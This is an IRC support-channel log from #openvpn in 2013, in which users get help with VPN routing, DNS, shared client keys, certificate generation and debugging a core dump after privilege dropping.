it's isolated. There are VM-solutions where /dev/random is provided by the host kernel, and entropy collection can be done since that does have access to the physical hardware. 09:52 < MacGyver> pekster: So yes, it depends - but even in that case I wouldn't trust it. 09:53 < pekster> Right. 
And I still wouldn't want my CA in someone else's cluster computing environment 09:53 < MacGyver> One of the reasons why I wouldn't trust it. 09:54 < rob0> The most paranoid among us will keep the CA on a USB key and in a safe. 09:54 < MacGyver> Point is that there's far better reasons than "there's no entropy source" *not* to do this. 09:54 < MacGyver> Because "there's no entropy souce" isn't even always true. 09:54 < pekster> Entropy is a big deal. I recommend "Facthacks" from the 2012 29C3 09:54 < pekster> (1h talk, worth your time if you're into entropy and RSA keys and such) 09:55 < MacGyver> I know. I was there. 09:56 < MacGyver> And although entropy is a big deal, another thing you should've taken away from that talk is that pastebin is not secure cloud storage ;) 09:56 < MacGyver> (Well, really, that storing keys in the cloud is not a good idea in general.) 09:57 < MacGyver> My point is that when the only reason for not doing this, that you provide, is "there's no entropy", somebody will counter with "but there is in my setup", do it anyway, and then be bitten because of all the other things that are wrong with that setup. 09:57 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 09:57 < MacGyver> Anyway, I've gotta go to a meeting. 09:58 < pekster> I believe both big reasons were covered above, before any of this. 
entropy + system security
11:59 < mibofra> hi :))
12:00 < mibofra> Can anyone tell me if OpenVPN doesn't use GRE?
12:00 < rob0> OpenVPN does not use GRE.
12:03 < mibofra> rob0 thanks :)), cos I've tried to use a pptp one, but my modem (strange XD ) doesn't support vpn passthrough (and GRE XD) so I can use a vpn pptp network only locally (very useful XD). So I've to try with OpenVPN
12:05 < mibofra> I've seen lots of howtos on configuring an openvpn server... But is there an OpenVPN control gui :)) ? (or I've to use webmin)
12:06 < rob0> OpenVPN uses a single UDP port for transport, so it's usually easy to get through firewalls. (Can also use TCP.) I don't use any GUI, can't comment.
12:07 < mibofra> ok, so I've and udp port opened for my vpn server, so I'll use it
12:08 < mibofra> *an udp port XD
13:09 < copper> hi
13:10 < copper> I came here a short while ago complaining about smartphone battery usage, and blaming openvpn for Android
13:10 < copper> I was wrong. What was killing the battery was my IRC client
13:10 < copper> specifically, the fact that I was present in a channel with lots of traffic
13:11 < copper> as soon as I parted that channel, I got my battery life back
13:11 < copper> Sorry for jumping to conclusions.
14:19 < hrenovo> hi. So I have win7 client connected to openvpn server and I have 'redirect' enabled
14:20 < hrenovo> So if I have port forwarding rules in the router, are they now dismissed ?
14:20 < hrenovo> because all traffic goes to openvpn TAP interface
14:20 < hrenovo> ?
14:26 < pekster> hrenovo: That causes asymmetric routing as the reply from your internal system doesn't go back through your original router. Since you're probably performing NAT on the redirected traffic as it goes out your VPN server, it has a different source address and the original sender will reject it.
You have 2 choices to fix that:
14:27 < pekster> 1) Perform hairpin NAT where you have your router on your real Internet connection NAT the packets so they appear to your LAN client as if the router sent them (thus losing any chance of knowing where they really came from) or 2) set up policy routing on your LAN client (not the router) to send traffic received on your exposed service back out your ISP's route, not via the VPN
14:52 < EddieBauer> !welcome
14:52 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
14:52 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
14:53 < EddieBauer> !ask
14:53 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc
14:55 < lord4163> Hello
14:55 < EddieBauer> Hello. Could anyone explain to me the security-related dangers in distributing a single client.key to multiple users along with the config? Could someone sniff the traffic of another client with that key somehow?
14:56 < lord4163> what do I have to fill in EXPORT_COUTRY ? I'm living in Sweden????
14:59 < EddieBauer> I'm currently distributing the same ca.crt, client.ovpn, client.crt, and client.key to multiple people so they can access the OpenVPN server. Is this a bad idea? Is there a better way of making it so anyone can connect to the VPN without needing a password?
15:00 < Aketzu> then all clients look exactly the same and you can disable them only all at once
15:01 < Aketzu> it's easy to script creating separate client.crt + key for every client with different name... then you can identify clients in configs, set static IPs, disable/revoke single clients etc.
15:01 < EddieBauer> I see... Assuming that it isn't particularly important to differentiate amongst clients, or have any fine-grained control over them, is this still an approach that's safe?
15:02 < Aketzu> key is negotiated per session so I'd say yes
15:02 < Aketzu> (with static key it would use the same encryption key for all which is bad)
15:03 < EddieBauer> Ah ok. Thanks Aketzu. Regarding the scripting to create the client.crt and key, do you mean using the OpenVPN up script?
15:03 < Aketzu> nope, some different script.. when you create & distribute configs
15:03 < EddieBauer> Gotcha. Thanks again.
15:04 < Aketzu> paid access server does some of that magic automatically
15:05 < lord4163> What a disaster
15:07 < pekster> EddieBauer: With the same private key, one client who was able to capture a full session (the TLS negotiation is the important bit) could theoretically decrypt the entire stream into plaintext since that TLS session is what creates the session keys used to encrypt the data
15:09 < pekster> lord4163: What are you referring to?
If you're referring to the US cryptography export laws, I don't think they'd impact you in Sweden unless you're packaging something that needs to be export friendly *from* the US
15:09 < EddieBauer> I see. That makes sense. So best to generate the key on the client's end?
15:10 < lord4163> Couldn't you guys have made a simple bash script for installing OpenVPN? I'm getting a headache.
15:10 < lord4163> pekster: I don't know, I'm just a dumbass it seems, can't understand the installation process
15:11 < pekster> EddieBauer: Correct. Ideally your PKI system isn't on your server or any other VPN-connected host, and each client (and the server) generates their own keypair on the device to be used, and sends the signing request to the CA. The CA signs it and sends back a certificate, both of which can happen in plaintext by merely verifying the hash or fingerprint with the sender if you're super-security conscious
15:12 < pekster> lord4163: There are builds in almost all mainstream distros via their own package managers, and a build from source is the standard untar, ./configure, make, make install process. And Windows has a native installer too
15:12 < EddieBauer> Alright, thanks.
15:12 < lord4163> pekster: yeah but you have to configure it.
15:13 < pekster> !howto
15:13 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
15:15 < lord4163> pekster: Okay thx will read that tomorrow, I'm willing to switch from PPTP, it doesn't autoconnect to my VPN on Android. OpenVPN does right?
15:16 < pekster> I haven't yet used the android client, but openvpn has keepalive and restart support depending on configuration
15:16 < pekster> !keepalive
15:16 <@vpnHelper> "keepalive" is (#1) see --keepalive in the manual for how to make clients retry connecting if they get disconnected.
or (#2) basically it is a wrapper for managing --ping and --ping-restart in server/client mode or (#3) if you use this, don't use --tls-exit and also avoid --single-session and --inactive
15:17 < lord4163> awesome, will set this up tomorrow in virtualbox, then install it in production if it works fast :)
15:18 < lord4163> The Android client is really snappy. Really well done ;)
15:19 < lord4163> bye
17:02 < Volkswagner> Greetings, I have this config for server on WNDR3800 router running OpenWRT backfire http://pastebin.com/hhXWSGr5
17:03 < Volkswagner> Clients do connect, but can't ping server. Clients register a tun ip in the /tmp/ipp.txt
17:03 < Volkswagner> But clients don't show up in /var/log/openvpn-status.log while connected
17:04 < Volkswagner> Should my tun adapter on server be bridged to lan interface in router config?
17:05 < Volkswagner> This was the case when using tap device, not sure what to do with tun device
17:16 < pekster> Likely firewalls. OpenWRT makes a mess of firewalls, like most do-it-for-you frontends
17:17 <@krzee> you definitely don't bridge a tun device
17:17 <@krzee> you say you can't ping server… can the server ping them?
17:17 < pekster> The status log isn't instant, so it'll take whatever the default period is to refresh. The manpage doesn't actually list what that is, but IIRC is somewhere between 30 and 120 seconds
17:37 < pekster> (60s, just got around to looking it up in the sources.)
18:02 < Volkswagner> pekster, krzee thanks. I waited several minutes to check status log
18:02 < Volkswagner> I'll dig deeper
18:03 <@krzee> you can update the status log manually as well
18:03 <@krzee> see SIGNALS in the manual
18:03 <@krzee> !man
18:03 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend!
--- Day changed Tue Mar 26 2013
00:23 < arthurdent> when doing speedtests on speedtest.net with my vpn enabled, my internet connection appears ridiculously fast
00:24 < arthurdent> is my internet connection actually faster or is it just appearing that way and still bottlenecked to my normal ISP speeds?
00:28 < Aketzu> openvpn can do compression
00:28 < rob0> hmm, it could be that the VPN server queues your packets and makes it appear faster, but obviously you will be limited to what your ISP can do.
00:29 < arthurdent> I figured as much, I'm really not sure how these speed-test websites actually calculate speed.
00:34 < arthurdent> thanks
00:34 < rob0> Aketzu, IME the LZO compression is not really very effective.
01:07 < pekster> rob0: Unless the "speedtest" is the alphabet or a bunch of 0x00 bytes :)
01:25 < Aketzu> GET /speedtest/latency.txt?x=1364278940892 HTTP/1.1
01:25 < Aketzu> GET /speedtest/random350x350.jpg?x=1364278943394&y=1 HTTP/1.1
01:26 < Aketzu> bzip2, random350x350.jpg: 1.085:1, 7.372 bits/byte, 7.85% saved, 245388 in, 226122 out.
01:27 < Aketzu> ok, pretty much incompressible
01:27 < Aketzu> everything happens through single TCP socket so ISP might have some fancy rate limiting in place
01:30 < Aketzu> ha... upload is simple repeating string like "CKOXYDXUHXLSEXEIOQRBPTBMHNVEJURSOYQUQYFOXTXGGXNFAMPYOGJEGVSWQS..."
01:30 < Aketzu> upload.txt: 732.843:1, 0.011 bits/byte, 99.86% saved, 499799 in, 682 out.
05:25 < LEDfan> Hi. Can someone help me with my openvpn configuration? I want to route everything through the openvpn server. But I can't ping or access any server. These are my config files: https://46.249.33.111/server.conf (sorry for the ssl error) https://46.249.33.111/client.conf
05:38 < LEDfan> Okay. I have changed a few things and I can ping now. But I can't access all websites.
05:51 < aoeui> LEDfan: DNS?
06:21 < LEDfan> aoeui: yes it's a dns problem.
06:22 < pppingme> what are you using for dns?
06:24 < LEDfan> 8.8.8.8
06:25 < LEDfan> push "dhcp-option DNS 10.1.0.1" on the server
06:26 < LEDfan> I have tried them both.
06:27 < LEDfan> I can access facebook, g+, etc but smaller sites not.
But I can't execute this command: tun-mtu 1400
06:38 < MacGyver> ecrist: So, I just hit that bug from last week again.
06:38 < MacGyver> ecrist: This time I got a coredump.
06:43 <@dazo> MacGyver: do you know how to use gdb?
06:44 < MacGyver> dazo: Yes and no.
06:44 < MacGyver> dazo: I know how to get a backtrace. I don't know how to fix missing symbols and whatnot.
06:44 < pppingme> can you ping 8.8.8.8 ?
06:44 <@dazo> MacGyver: okay .... $ gdb .... and then 'bt' when you get the command line ...
06:44 <@dazo> oh ...
06:44 < pppingme> oh, wait, just read..
06:45 <@dazo> MacGyver: well, pastebin what you get ... and we'll see what we can get out of it
06:45 < pppingme> LEDfan what happens when you try to access smaller sites?
06:47 < MacGyver> dazo: Probably totally useless, it's just addresses with question marks and empty parentheses.
06:48 <@dazo> MacGyver: okay ... then you need to do an openvpn build, with CFLAGS += -g
06:48 <@dazo> MacGyver: what OS/distro are you on?
06:51 < MacGyver> dazo: Arch.
06:52 < MacGyver> dazo: Maybe it would help if gdb was able to load shared symbols for linux-gate.so.1, that's the only warning I get. But openvpn is unfortunately built without symbols.
06:52 <@dazo> MacGyver: I believe this should help you in the right direction ... https://wiki.archlinux.org/index.php/Debug_-_Getting_Traces
06:52 <@vpnHelper> Title: Debug - Getting Traces - ArchWiki (at wiki.archlinux.org)
06:52 <@dazo> it would be enough if just openvpn has debug symbols compiled in ... we seldom hunt issues outside openvpn
06:54 < LEDfan> pppingme: I can't access e.g. mijnip.be/
07:04 < LEDfan> Sorry for the bad information, I need to go now.
07:36 < LEDfan> I'm back. I think I know the problem. (not sure). I think my server needs to access too many hops to get to the website. So I need to change the mtu. But this tun-mtu 1400
07:36 < LEDfan> command is not found?
07:37 <@ecrist> mtu has nothing to do with hops
07:41 < LEDfan> ecrist: oh yes. I'm a little confused.
07:41 <@ecrist> !goal
07:41 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc
07:41 <@ecrist> !logs
07:41 <@ecrist> !configs
07:41 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it and select Copy log text to clipboard or (#4) if you don't know how to find your logs, see !logfile
07:41 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) don't forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config
07:47 < LEDfan> Goal: I would like to access the internet over my vpn. Server os: Debian (on a VPS), Client os: Arch Linux.
Server config: https://46.249.33.111/server.conf Client config: https://46.249.33.111/client.conf Server log: https://46.249.33.111/server.log
07:49 -!- LEDfan [~quassel@94-226-126-193.access.telenet.be] has quit [Read error: Operation timed out]
07:52 -!- LEDfan_ [~quassel@94-226-126-193.access.telenet.be] has quit [Ping timeout: 264 seconds]
07:58 -!- matsh [divine@nanogene.org] has joined #openvpn
07:59 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
08:00 -!- penk [~dave@static-66-137-171-68.axsne.net] has joined #openvpn
08:14 -!- dropje_ is now known as Dropje
08:25 -!- LEDfan [~quassel@94-226-126-193.access.telenet.be] has joined #openvpn
08:26 -!- hrenovo_ [~hrenovo@li469-37.members.linode.com] has joined #openvpn
08:29 -!- hrenovo_ [~hrenovo@li469-37.members.linode.com] has quit [Client Quit]
08:29 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has quit [Ping timeout: 256 seconds]
08:30 -!- jzaw [~jzaw@2001:8b0:7:0:5054:ff:fe8e:3b24] has quit [Ping timeout: 256 seconds]
08:31 -!- jzaw [~jzaw@loki.dzki.co.uk] has joined #openvpn
08:40 < MacGyver> dazo: For most accurate results, I take it I should try to create an identical package with debug symbols compiled?
08:40 <@dazo> MacGyver: yeah
08:41 < MacGyver> *sigh*
08:41 < MacGyver> Ah well, let's start :)
08:42 -!- ade_ [~Ade@koln-5d817311.pool.mediaWays.net] has joined #openvpn
08:44 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn
08:46 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 252 seconds]
08:50 -!- kubbing [~kubbing@ip-89-176-96-114.net.upcbroadband.cz] has joined #openvpn
08:57 -!- kubbing [~kubbing@ip-89-176-96-114.net.upcbroadband.cz] has quit [Ping timeout: 264 seconds]
09:01 -!- mitz [~mitz@khp222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
09:04 -!- penk [~dave@static-66-137-171-68.axsne.net] has left #openvpn ["Linkinus - http://linkinus.com"]
09:06 -!- ade_ [~Ade@koln-5d817311.pool.mediaWays.net] has quit [Quit: Too sexy for his shirt]
09:06 -!- TypoNe [~itsme@195.197.184.87] has joined #openvpn
09:07 -!- ade_b [~Ade@koln-5d817311.pool.mediaWays.net] has joined #openvpn
09:07 -!- ade_b [~Ade@koln-5d817311.pool.mediaWays.net] has quit [Changing host]
09:07 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
09:20 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
09:31 -!- APTX_ is now known as APTX
09:32 < MacGyver> dazo: When compiling with debug symbols enabled, can I still compile with optimizations (to more closely mimic the original package), or does that really screw up debugging and should optimizations be limited to -O1 or none at all?
09:33 <@dazo> MacGyver: yeah, that's no problem at all ... the crucial argument is the '-g' in CFLAGS
09:33 <@dazo> and also not running 'strip' on the binary afterwards
09:34 < MacGyver> Yeah, those two are default, but in the arch instructions they also add -O1 to the compiler flags.
09:34 < MacGyver> Whereas -O2 is default, iirc.
09:43 < MacGyver> Okay, built, now it's a matter of waiting for the bug to manifest again.
09:54 < MacGyver> Oh great.
09:55 < MacGyver> Built with debug symbols, but hasn't dumped core even though it was a segfault...
09:55 < MacGyver> The hell...
09:57 <@ecrist> can't get a break, MacGyver
10:08 < MacGyver> I just... don't get it.
10:08 < MacGyver> Coredumps are enabled in ulimit for all users.
10:08 < MacGyver> This morning it dumped just fine.
10:08 < MacGyver> I haven't changed ulimits since then...
10:09 < MacGyver> And #archlinux is helpful as always.
10:10 < MacGyver> I.e. anything a little more advanced than "why should I use arch" barely gets a response.
10:22 < MacGyver> Right, I take that back, this one has piqued the interest of some people.
10:24 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit []
10:30 -!- raidz_away is now known as raidz
10:35 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Ping timeout: 272 seconds]
10:44 < MacGyver> It appears that when I kill openvpn with ^\, core is dumped just fine, but when killed with kill -segv, it isn't.
10:44 < MacGyver> Anything openvpn-specific this could be?
10:48 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
10:50 -!- cirdan [~chris@c-69-248-228-142.hsd1.nj.comcast.net] has joined #openvpn
10:51 < cirdan> hey all, i have a dns question. OpenVPN pushes 3 dns servers when I connect, but it seems the first one (my internal) isn't used
10:51 < cirdan> normal domains resolve but my internal ones won't. host -v shows it connecting to the 2nd dns server in the list
10:52 < cirdan> if i do it manually host opennms 10.0.0.2 it works fine. this is on 10.8, and scutil --dns and /etc/resolv.conf both have 10.0.0.2 listed first
11:04 -!- joshie__ is now known as joshie
11:06 -!- Aprogas_ is now known as Aprogas
11:06 < cirdan> oh nslookup shows Got recursion not available from 10.0.0.2, trying next server
11:06 < cirdan> hmm why would it do that
11:07 < cirdan> oh well, looks like allowing recursion for the vpn's subnet fixes it... odd though
11:07 < MacGyver> dazo, ecrist: It seems to be *very specific* to openvpn after dropping privs to user/group nobody, that it won't dump core.
11:07 < MacGyver> Cause when I start sleep with sudo -H -u nobody -g nobody /usr/bin/sleep 100, and then kill it with segv, it does dump.
11:08 < MacGyver> Thoughts on this, while I move my ass to the train?
11:08 <@EugeneKay> --user/--group priv dropping sucks.
11:08 <@EugeneKay> !unpriv
11:08 <@vpnHelper> "unpriv" is see https://community.openvpn.net/openvpn/wiki/UnprivilegedUser for a write-up by EugeneKay on how to run OpenVPN without root/admin permissions.
11:08 <@EugeneKay> Do it that way instead ^
11:09 < MacGyver> EugeneKay: I know - currently I don't care how much it sucks, it seems that these particular circumstances trigger a bug.
11:09 < MacGyver> EugeneKay: Because nobody *is* allowed to dump core on my system.
11:09 < MacGyver> And I want to know why openvpn isn't doing that.
11:11 <@EugeneKay> Because it's doing priv-dropping, not executing as nobody to begin with
11:12 < MacGyver> And the drop includes dropping dump-privs?
11:12 <@EugeneKay> Yup
11:22 < MacGyver> Any way to prevent that or giving it those privs back (eg through /proc) without altering code?
11:23 < MacGyver> No, wait.
11:23 < MacGyver> Never mind, I'll just attach gdb as root... That can still be done, right?
11:24 < MacGyver> At least it explains why the process isn't dumping.
11:27 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
11:29 -!- _quadDam1ge is now known as _quadDamage
11:30 -!- skn_ [~skn@a56212.upc-a.chello.nl] has joined #openvpn
11:32 < skn_> Hi all.. a noob here trying to install a server on Ubuntu and use the android client. the client connects but the android traffic doesn't seem to go through the vpn.. Anything obvious I am doing wrong?
11:39 < pekster> Make sure you can ping from your client to the server (letting you know you have a VPN connection as well as IP connectivity) and then see:
11:39 < pekster> !redirect
11:39 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
11:39 <@vpnHelper> http://ircpimps.org/redirect.png
11:46 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has joined #openvpn
11:47 < Keshl> Just saying, it's working great now. I'm away from home, my IP's my home IP, and everything's happy. Just had to add "redirect-gateway def1" to the client-side config. Forwarding was fine.
11:54 -!- JessD [~jdyer@71-14-120-17.dhcp.gnvl.sc.charter.com] has joined #openvpn
11:54 -!- Rough_ [eMc2@114.31.8.194] has joined #openvpn
11:54 -!- Ah2k_ [Ah2k@114.31.8.194] has quit [Quit: Leaving]
11:57 -!- cirdan [~chris@c-69-248-228-142.hsd1.nj.comcast.net] has left #openvpn []
12:02 <@dazo> MacGyver: which version are you running?
12:02 <@dazo> MacGyver: if you kill any process with -QUIT or -SEGV ... it is supposed to create a core file
12:02 <@dazo> (unless ulimit is configured otherwise)
12:04 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 256 seconds]
12:04 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has quit [Quit: Konversation terminated!]
12:07 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
12:26 -!- aoeui [~aoeui@gateway/tor-sasl/aoeui] has quit [Remote host closed the connection]
12:28 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 256 seconds]
12:28 -!- aoeui [~aoeui@gateway/tor-sasl/aoeui] has joined #openvpn
12:37 -!- Eagleman7 [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
13:00 -!- mitz [~mitz@khp222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection]
13:03 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has joined #openvpn
13:03 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
13:40 -!- surrealillusion [~surrealil@206.191.57.58] has joined #openvpn
13:40 < surrealillusion> afternoon all
13:41 < surrealillusion> i was wondering if I could get some suggestions as how to get the vpn_gateway directive to work on an openvpnas server?
13:41 < pekster> !as
13:41 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server
13:41 < surrealillusion> ah thanks for the pointer, cheers
13:42 < pekster> Yup. We deal with the open-source GPL OpenVPN project specifically here.
13:42 < surrealillusion> :) I may be back to ask questions for my personal setup at some point
13:51 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds]
13:55 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
13:55 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
13:55 -!- mode/#openvpn [+o krzee] by ChanServ
13:58 <@krzee> I'm so lazy that i generated certs 6 hours ahead by accident, just gunna wait it out to connect, lol
14:02 < rob0> lazee
14:08 <@EugeneKay> Smooth
14:12 < MacGyver> dazo: Yes, it's supposed to - but when a process drops privileges (which I have openvpn do), it doesn't matter which ulimits are set - something else (i.e. the flag which can be set by prctl's PR_SET_DUMPABLE) is cleared.
14:13 < MacGyver> I can *probably* try to force it to dump anyway by setting /proc/sys/fs/suid_dumpable to 1 or 2.
14:13 < MacGyver> Preferably 2.
14:14 < MacGyver> EugeneKay: Thanks for reminding me of that.
14:14 < MacGyver> That is, the fact that dumping privs are dropped when dropping user / group.
14:15 <@EugeneKay> !EugeneKay
14:15 <@vpnHelper> "EugeneKay" is right because EugeneKay is always right.
14:16 <@krzee> :D
14:17 < hazardous> !krzee
14:18 <@vpnHelper> "krzee" is (#1) krzee says happy 4/20 or (#2) http://www.ircpimps.org/pics/krzee/blunt.jpg or (#3) location: moon base where he smokes moonajuana
14:18 < hazardous> weeeeeed
14:18 <@EugeneKay> Not the moonajuana
14:18 <@krzee> moonbong in hand right now actually
14:18 <@EugeneKay> It is massive
14:18 <@EugeneKay> And fueled by tires
14:18 <@EugeneKay> From the moon
14:19 <@krzee> moontires
14:19 < rob0> tired of the moon
14:24 -!- vaillor [~ahah@2-226-37-187.ip179.fastwebnet.it] has joined #openvpn
14:24 < vaillor> hi guys
14:25 < vaillor> what difference is there between client and tls-client ?
14:26 <@krzee> !man
14:26 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend!
14:26 <@krzee> you have 2 entries to read
14:27 < vaillor> --tls-client
14:27 < vaillor> Enable TLS and assume client role during TLS handshake.
14:28 -!- tjz [~tjz@unaffiliated/tjz] has quit [Read error: Connection reset by peer]
14:28 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn
14:28 < vaillor> but i don't know what is tls :)
14:29 <@krzee> did you read --client ?
14:30 < vaillor> no
14:31 < vaillor> client = tls-client
14:31 < rob0> also scroll up a bit from --tls-client and see "TLS Mode Options:"
14:31 < vaillor> right?
14:31 < vaillor> --client A helper directive designed to simplify the configuration of OpenVPN's client mode.
This directive is equivalent to:
14:31 < vaillor> pull
14:31 < vaillor> tls-client
14:32 < rob0> and --tls-server explains a bit more about --tls-client
14:33 -!- bjh4 [~bjh4@12.239.198.1] has quit [Remote host closed the connection]
14:38 -!- KaiForce [~chatzilla@adsl-70-228-81-145.dsl.akrnoh.ameritech.net] has joined #openvpn
14:41 -!- djshotglass [~Guest7552@zz209205100107.cipherkey.net] has joined #openvpn
14:42 < djshotglass> is there an easy way for a client to have a cert generated automatically if they have never connected before?
14:43 < djshotglass> I'm only using the vpn for a call home type deal in my software
14:43 < djshotglass> so they can access their webui from anywhere
14:44 < djshotglass> I've been using a shared cert but all of their ips change so often
14:44 < djshotglass> even though they are not rebooted or anything
14:45 < djshotglass> and for some insane reason there is always more than 1 on same ip
14:45 -!- speed_racer8 [~speed_rac@c-76-30-144-32.hsd1.tx.comcast.net] has joined #openvpn
14:46 < pekster> djshotglass: The certificate comes from your CA. The client keypair (the public+private RSA key) can be generated on the client, but you still need to send the cert request to the CA for signing before it will be allowed to connect to a multi-server instance
14:50 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds]
14:52 < MacGyver> Of course, finally got coredumping set up, now I'm unable to reproduce the bug.
14:53 < MacGyver> *sigh*
14:54 < MacGyver> Ah well, gotta remember to set suid_dumpable over reboots.
14:55 < djshotglass> !static
14:55 <@vpnHelper> "static" is (#1) use --ifconfig-push in a ccd entry for a static ip for the vpn client or (#2) example in net30 (default): ifconfig-push 10.8.0.6 10.8.0.5 example in subnet (see !topology) or tap (see !tunortap): ifconfig-push 10.8.0.5 255.255.255.0 or (#3) also see !ccd and !iporder
14:55 < djshotglass> !ccd
14:55 <@vpnHelper> "ccd" is (#1) entries that are basically included into server.conf, but only for the specified client based on common-name. use --client-config-dir to enable it, then put the config options for the client in /common-name or (#2) the ccd file is parsed each time the client connects.
14:55 < djshotglass> !iporder
14:55 <@vpnHelper> "iporder" is (#1) OpenVPN's internal client IP address selection algorithm works as follows: 1 -- Use --client-connect script generated file for static IP (first choice). or (#2) Use --client-config-dir file for static IP (next choice) !static for more info or (#3) Use --ifconfig-pool allocation for dynamic IP (last choice) or (#4) if you use --ifconfig-pool-persist see !ipp
14:56 -!- tjz [~tjz@unaffiliated/tjz] has quit [Read error: Connection reset by peer]
14:56 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn
14:57 < djshotglass> example of client-connect?
14:59 < pekster> !client-connect
14:59 <@vpnHelper> "client-connect" is --client-connect